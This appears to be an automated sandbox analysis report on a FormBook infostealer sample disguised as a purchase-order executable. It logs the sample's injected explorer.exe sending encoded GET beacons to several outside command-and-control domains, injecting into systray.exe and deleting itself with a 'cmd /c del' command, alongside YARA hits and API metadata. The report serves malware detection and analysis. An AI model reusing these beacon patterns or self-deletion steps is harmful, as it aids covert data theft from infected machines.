                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Apr 8, 2021 13:33:51.695214033 CEST | 5687 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 08 Apr 2021 11:31:55 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 793
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49724 | 103.253.212.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:34:02.044403076 CEST | 5688 | OUT | GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu HTTP/1.1
                                                                                Host: www.kopebitest.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Apr 8, 2021 13:34:02.446372032 CEST | 5688 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 08 Apr 2021 11:34:02 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, close
                                                                                Location: http://kopebitest.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 0
                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49728 | 212.237.249.116 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:34:23.128309011 CEST | 5741 | OUT | GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=eLrKZiH/4/rcvGguyk8xXNlCiwRhUX1CU5PxP0qOxyscr2i7rTHvuvRLv311KV985405 HTTP/1.1
                                                                                Host: www.farmacyfastfood.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Apr 8, 2021 13:34:23.162314892 CEST | 5742 | IN | HTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                Content-Type: text/html
                                                                                Content-Length: 707
                                                                                Date: Thu, 08 Apr 2021 11:34:23 GMT
                                                                                Server: LiteSpeed
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49729 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:34:28.232156038 CEST | 5743 | OUT | GET /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.bigbuddyco.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Apr 8, 2021 13:34:28.263297081 CEST | 5743 | IN | HTTP/1.1 302 Found
                                                                                Connection: close
                                                                                Pragma: no-cache
                                                                                cache-control: no-cache
                                                                                Location: /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut


                                                                                Session ID: 8
                                                                                Source IP: 192.168.2.5
                                                                                Source Port: 49730
                                                                                Destination IP: 209.99.40.222
                                                                                Destination Port: 80
                                                                                Process: C:\Windows\explorer.exe

                                                                                Timestamp: Apr 8, 2021 13:34:34.094811916 CEST
                                                                                kBytes transferred: 5744
                                                                                Direction: OUT
                                                                                Data: GET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5 HTTP/1.1
                                                                                Host: www.agarkovsport.online
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:

                                                                                Timestamp: Apr 8, 2021 13:34:34.314126968 CEST
                                                                                kBytes transferred: 5745
                                                                                Direction: IN
                                                                                Data: HTTP/1.1 200 OK
                                                                                Date: Thu, 08 Apr 2021 11:34:34 GMT
                                                                                Server: Apache
                                                                                Set-Cookie: vsid=918vr3654272741917697; expires=Tue, 07-Apr-2026 11:34:34 GMT; Max-Age=157680000; path=/; domain=www.agarkovsport.online; HttpOnly
                                                                                Content-Length: 272
                                                                                Keep-Alive: timeout=5, max=125
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (18)</h3></div></body></html>


                                                                                System Behavior

                                                                                General

                                                                                Start time:13:32:31
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
                                                                                Imagebase:0xa10000
                                                                                File size:532480 bytes
                                                                                MD5 hash:3A480D8D735EFE129DCCCEA48A054721
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Start time:13:32:41
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Imagebase:0x450000
                                                                                File size:532480 bytes
                                                                                MD5 hash:3A480D8D735EFE129DCCCEA48A054721
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:low

                                                                                General

                                                                                Start time:13:32:44
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff693d90000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:13:33:00
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\systray.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                Imagebase:0x10c0000
                                                                                File size:9728 bytes
                                                                                MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:13:33:04
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:/c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
                                                                                Imagebase:0x130000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:13:33:05
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7ecfc0000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Disassembly

                                                                                Code Analysis

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6AB0
                                                                                  • GetCurrentThread.KERNEL32 ref: 013E6AED
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6B2A
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 013E6B83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: 470e3fd8ce1efe29baed98c3861589a0ad798057a4e80779cad9facd684b3d1d
                                                                                  • Instruction ID: 6c22e392f95cd5b35a8f952da35710d4b444827d207378c58f5a6a73aa0fa0d4
                                                                                  • Opcode Fuzzy Hash: 470e3fd8ce1efe29baed98c3861589a0ad798057a4e80779cad9facd684b3d1d
                                                                                  • Instruction Fuzzy Hash: 055174B49003498FDB04CFAAD549B9EBBF0BF49318F14846AE418A7390D7349848CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6AB0
                                                                                  • GetCurrentThread.KERNEL32 ref: 013E6AED
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6B2A
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 013E6B83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: e1b030cdfe311304df3d40e6808fc7f59c86c03c2e80818070b1ef9002f21b45
                                                                                  • Instruction ID: a2a4b5e2d61bc883f776e2f2a1a97d5ae3c148a444fdb33706332e9ff9af3838
                                                                                  • Opcode Fuzzy Hash: e1b030cdfe311304df3d40e6808fc7f59c86c03c2e80818070b1ef9002f21b45
                                                                                  • Instruction Fuzzy Hash: 525152B4D003498FDB14CFAAD548BDEBBF0BF49318F248469E419A7390D774A888CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013EE02A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 64ea9eff939c3ab3c8d8e3bfb1394e069e6094449cbbe933451434b268a46ab2
                                                                                  • Instruction ID: 184c2377c29a0d64470f42d28d078a9645b30c12cc48e1f1c3cddacdd8684bad
                                                                                  • Opcode Fuzzy Hash: 64ea9eff939c3ab3c8d8e3bfb1394e069e6094449cbbe933451434b268a46ab2
                                                                                  • Instruction Fuzzy Hash: BB51C0B1D003189FDB14CFAAC884ADEBFF5BF48314F25812AE819AB250D7759945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013EE02A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 93dce218060dbe582a336f5c82fd310bcde728375065b1ea96761c54ee55f1a9
                                                                                  • Instruction ID: c4f2019a10d0699edfd7008750182672e138dc2055d2864f3202e9785b785133
                                                                                  • Opcode Fuzzy Hash: 93dce218060dbe582a336f5c82fd310bcde728375065b1ea96761c54ee55f1a9
                                                                                  • Instruction Fuzzy Hash: 5641CFB1D003199FDB14CF9AC884ADEBFF5BF48314F24862AE819AB250D7759945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E7107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: ee15635addccd15aef972b27d193bf0cf29fc5d0ee4c2f41956851af7ee0e63b
                                                                                  • Instruction ID: 8642c8e7165bf27d728ccb9eaec393393820fa097096a8c85a94e3053c26b3c4
                                                                                  • Opcode Fuzzy Hash: ee15635addccd15aef972b27d193bf0cf29fc5d0ee4c2f41956851af7ee0e63b
                                                                                  • Instruction Fuzzy Hash: 14416876900319AFCB01CF99D844AEEBFF9FB88314F14802AE915A7360C3759955CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 05483DF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.254723941.0000000005480000.00000040.00000001.sdmp, Offset: 05480000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 886508f8f255455b75744fd4f2245f619973e6c2e3729054c1fe0f6e7ea14892
                                                                                  • Instruction ID: 01559b8fd43c2760e5560b1719a10ec2fd6fd7142ee430d278604383d6bb3667
                                                                                  • Opcode Fuzzy Hash: 886508f8f255455b75744fd4f2245f619973e6c2e3729054c1fe0f6e7ea14892
                                                                                  • Instruction Fuzzy Hash: D2410471C0431CCBDB24DFA9C8887EEBBB1BF48704F11856AD509AB251D775694ACF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05480D91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.254723941.0000000005480000.00000040.00000001.sdmp, Offset: 05480000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2714655100-0
                                                                                  • Opcode ID: 2210f5aa72e187e0ad90524d15e3ad0adeeb95967b1879a310cbcf2d44c98120
                                                                                  • Instruction ID: f7d68a0d51560031655dbce5e34abb585d312e4b3bcd33558f1c780f083a5eeb
                                                                                  • Opcode Fuzzy Hash: 2210f5aa72e187e0ad90524d15e3ad0adeeb95967b1879a310cbcf2d44c98120
                                                                                  • Instruction Fuzzy Hash: FB4129B8910209DFCB14DF99C488BAEBBF5FB89314F15845AD519AB321D334A845CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E7107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: d4769eca30886a886604489463cf89f7e20b638865f9bc37b1dd2acad8f90184
                                                                                  • Instruction ID: 321fb8e400ea53a34cda2e1e2c726c31f4468f617327fc6e48b2bf6913b062b0
                                                                                  • Opcode Fuzzy Hash: d4769eca30886a886604489463cf89f7e20b638865f9bc37b1dd2acad8f90184
                                                                                  • Instruction Fuzzy Hash: 2F21F4B5900318AFDB10CF99D884ADEBBF4EB48324F14841AE914A7350D374A954CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E7107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 4e1b0ce139ce3172ad12cae2a0f00a02a69a5da55a2e9d4db6f9acf91c56464c
                                                                                  • Instruction ID: e674d646e0daae011b997e274859b142c2fe79b65fd8f48dbaa07f5d9fe54dfe
                                                                                  • Opcode Fuzzy Hash: 4e1b0ce139ce3172ad12cae2a0f00a02a69a5da55a2e9d4db6f9acf91c56464c
                                                                                  • Instruction Fuzzy Hash: C121F3B5900318AFDB10CFAAD884ADEFBF8FB48324F14841AE954A3350D374A954CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD21,00000800,00000000,00000000), ref: 013EBF32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 423baa2cfcb3d6becb9c7ec264c688507bb30975de24b150b25574262632a1dd
                                                                                  • Instruction ID: d1093bd5f22f42a4e82c7e0cc17ea9aa4691ec0299dc0678ba3d9845b70d24ec
                                                                                  • Opcode Fuzzy Hash: 423baa2cfcb3d6becb9c7ec264c688507bb30975de24b150b25574262632a1dd
                                                                                  • Instruction Fuzzy Hash: F21144B28043188FCB10CF9AD448BDEFBF4EB88324F05842EE915A7240C375A949CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD21,00000800,00000000,00000000), ref: 013EBF32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 080476130425107f717fb99e879984c5a755d3335944c066835b5fed7fa2595f
                                                                                  • Instruction ID: 13741bc7f6235f1785e0e02922dae547ace06560f06e08e3976b7d015fc9803a
                                                                                  • Opcode Fuzzy Hash: 080476130425107f717fb99e879984c5a755d3335944c066835b5fed7fa2595f
                                                                                  • Instruction Fuzzy Hash: 452144B28003198FCB10CF9AD848ADEFBF4BB98314F15852EE515A7240C375A54ACFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 013EBCA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 622b131de42024a2b5c3d9b9460cb166181d042bc746e01ebe4c8d37dc551945
                                                                                  • Instruction ID: 33b93c39d51bb34e353ad89d1ffa9a2602cbd1c9493e41f311fc00796aad722e
                                                                                  • Opcode Fuzzy Hash: 622b131de42024a2b5c3d9b9460cb166181d042bc746e01ebe4c8d37dc551945
                                                                                  • Instruction Fuzzy Hash: C51113B5C003198FDB10CF9AC448BDEFBF8AB89224F15841AD829B7600C375A549CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 013EE1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1378638983-0
                                                                                  • Opcode ID: b4a782a38ec139c653a6f06e71bf96c084f4e6454ddebe2d1a28ffeda71e3fd1
                                                                                  • Instruction ID: 86d2c6204e9f86c8f1638a8193d19318bde72f6540daa2e2cbd3a7292baacc41
                                                                                  • Opcode Fuzzy Hash: b4a782a38ec139c653a6f06e71bf96c084f4e6454ddebe2d1a28ffeda71e3fd1
                                                                                  • Instruction Fuzzy Hash: 401103B5900318DFDB10DF99D888BDEBBF8EB58324F14841AE915A7340C374A949CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 013EE1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1378638983-0
                                                                                  • Opcode ID: a82cad294e414705e73bfed749d5b1f8a4faa6b93eb27b5e0c006fbc540f87d8
                                                                                  • Instruction ID: 0cd0370ddaa42f1d8da84abb8497193640e989bbd8460b1a3c8756cb4d268bba
                                                                                  • Opcode Fuzzy Hash: a82cad294e414705e73bfed749d5b1f8a4faa6b93eb27b5e0c006fbc540f87d8
                                                                                  • Instruction Fuzzy Hash: 6F1112B5800318CFDB10DF99D888BDEBBF8EB48324F10841AE914A3340C374A948CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: af8029578c1b645b9559dc078e7d71261bf84fd7269111db653f85cfab90f439
                                                                                  • Instruction ID: 83653fbe27aa2a37f9dbecbb42d1d5f732651b2220b185ba9b4f90c7a0c7eecc
                                                                                  • Opcode Fuzzy Hash: af8029578c1b645b9559dc078e7d71261bf84fd7269111db653f85cfab90f439
                                                                                  • Instruction Fuzzy Hash: A3527DB1500B06CFD732CF5AE6C85997BB1FB45328F904218D1616FAE9D3B8698ACF44
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6009cc464a3b9b7f5122488ac9db8ce022c8435001b6785a2b272fbee8ab7fbc
                                                                                  • Instruction ID: c24134165e4369502e20df792091e2c171243c390fa1b567f33c1e12f7e78b85
                                                                                  • Opcode Fuzzy Hash: 6009cc464a3b9b7f5122488ac9db8ce022c8435001b6785a2b272fbee8ab7fbc
                                                                                  • Instruction Fuzzy Hash: 67A17132E0031A8FCF06CFA9C84859EBBF2FF85304B15856AE905BB265EB359945CF40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID: R=A$R=A
                                                                                  • API String ID: 2738559852-3742021989
                                                                                  • Opcode ID: 70067cdd1c74621638cabaa7177c1fd80e7c0fe7fcc567be2bb0a1ac9b880601
                                                                                  • Instruction ID: 463bab87a4bd95a43e8606868e28964cbda32e348ed646a95a701fcfc1f639f3
                                                                                  • Opcode Fuzzy Hash: 70067cdd1c74621638cabaa7177c1fd80e7c0fe7fcc567be2bb0a1ac9b880601
